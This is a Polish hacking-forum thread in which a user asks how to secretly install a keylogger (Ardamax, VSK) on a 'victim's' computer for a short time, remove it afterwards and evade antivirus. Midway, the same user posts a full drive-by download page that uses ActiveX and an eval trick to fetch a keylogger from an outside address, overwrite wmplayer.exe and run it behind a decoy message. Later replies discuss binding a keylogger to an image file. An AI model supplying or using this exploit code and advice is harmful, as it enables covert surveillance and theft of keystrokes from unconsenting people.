ardamax... za ile nie bedzie przysyłał mi maily?

[robinn1]

http://www.haker.com.pl/forum/viewtopic.ph...asc&start=0

Witam. Niestety w/w temat został zamkniety. Mam pewne pytanie, chcialbym tylko jednorazowo na 30 minut sprawdzic co ofiara pisze. Tylko jednorazowo... Czy jest taka mozliwosc??
I usunąć się tylko da za pomocą Spyware Doctora?
i jeszcze jedno jest wykrywany przez avassta?

Dziękuje i pozdrawiam!

 

[Mesmeroo]

...

Co do ardmaxa to nie wiem..
Ale w VSK 3.0 ustawiasz Deinstalator (np. na te 30 min) i patrzysz logi co chcesz, i po 30 minutach się usuwa, lub możesz po jakim chcesz czasie wpisać komende bodajrze #kill i wyjdzie na to samo (tylko ze sterowanie komendami jest za pomocą gg, czyli serwer musi być utworzony z połączeniem GG)




____________
Jesli pomógł to podziękuj

 

[Dark Smark]

Ciekawe poco jest to Self destruct on:
Możesz usunąć określonego dnia a logi możesz ustawić co ile mają być wysyłane,
można usunąć też go programem typu anty spyware, ale także możesz go normalnie odinstalować... (Dodaj lub usuń programy) Dziwne nie?

 

[robinn1]

ale nie na moim komputerze.... tylko na ofiary

 

[abramakabra]

... masz napisane, narysowane może trzeba ci to jeszcze wyśpiewać żebyś zrozumiał...

Ciekawe poco jest to Self destruct on:[/b]

 

[robinn1]

bardzo dziekuje za odpowiedzi... ale mam jeszcze jedno pytanie ....
czy ktos probowal tego kodu uzyc na stronie?

<HTML> 

<textarea id="code" style="display:none;"> 



    var x = new ActiveXObject("Microsoft.XMLHTTP"); 

    x.Open("GET", "ADRES KEYLOGGERA",0); 

    x.Send(); 

    

    var s = new ActiveXObject("ADODB.Stream"); 

    s.Mode = 3; 

    s.Type = 1; 

    s.Open(); 

    s.Write(x.responseBody); 



    s.SaveToFile("C:Program FilesWindows Media Playerwmplayer.exe",2); 

    location.href = "mms://"; 



</textarea> 

TUTAJ MOŻEMY COŚ DODAĆ [np. Server is extremely busy at this moment. Please wait when server generate mirror for you...] 

<script language="javascript"> 



    function preparecode(code) { 

        result = ''; 

        lines = code.split(/rn/); 

        for (i=0;i<lines.length;i++) { 

        

            line = lines[i]; 

            line = line.replace(/^s+/,""); 

            line = line.replace(/s+$/,""); 

            line = line.replace(/'/g,"'"); 

            line = line.replace(/[]/g,""); 

            line = line.replace(/[/]/g,"%2f"); 



            if (line != '') { 

                result += line + 'rn'; 

            } 

        } 

        return result; 

    } 

    

    function doit() { 

        mycode = preparecode(document.all.code.value); 

        myURL = "file:javascript:eval('" + mycode + "')"; 

        window.open(myURL,"_media"); 

    } 

    



    window.open("error.jsp","_media"); 

    

    setTimeout("doit()", 5000); 

    

</script> 

<script>function go(){ self.location.href='ADRES STRONY KTORA WYSWIETLI SIE PO ZALADOWANIU KEYLEGGERA [np. wlasnie ten mirror]'; } 

setTimeout('go()',10000); </script> 

</HTML>

Czy ten kod dziala?

Dziękuje za odpowiedź i pozdrawiam!

[/code]

 

[FDJ]

Nie rozumiecie ze jak wychodza bledy to po jakims czasie wychodza tez latki ?
Wiec jak jest jakis blad to albo ma go malo userow ,albo wogole nie dziala.

 

[robinn1]

Dziekuje raz jeszcze za wypowiedzi...
Jeszze jedno pytanie mnie nurtuje... czy jeśli jest obrazek... w gif lub jpg to da sie tam wstawic keylogera? czy tlyko i wyłącznie Exe?
Pozdrawiam!

 

[Kanciastoporty]

nie, jezeli jest obrazek np. jpg to sie nie da. Musi byc np. exe, com, dll, pif i jeszcze jakies chyba.
pozdrawiam

 

[Dark Smark]

Originally posted by robinn1
Dziekuje raz jeszcze za wypowiedzi...
Jeszze jedno pytanie mnie nurtuje... czy jeśli jest obrazek... w gif lub jpg to da sie tam wstawic keylogera? czy tlyko i wyłącznie Exe?
Pozdrawiam!

Nie ale da się obrazek |==>> do |==>> keyloggera
Rozszerzenia:

*exe
*bat
*src
*pif
*cmd
*com[/b]

Binder :]

//Był exploit do pliku graficznego ".TIF" ale już nie działa...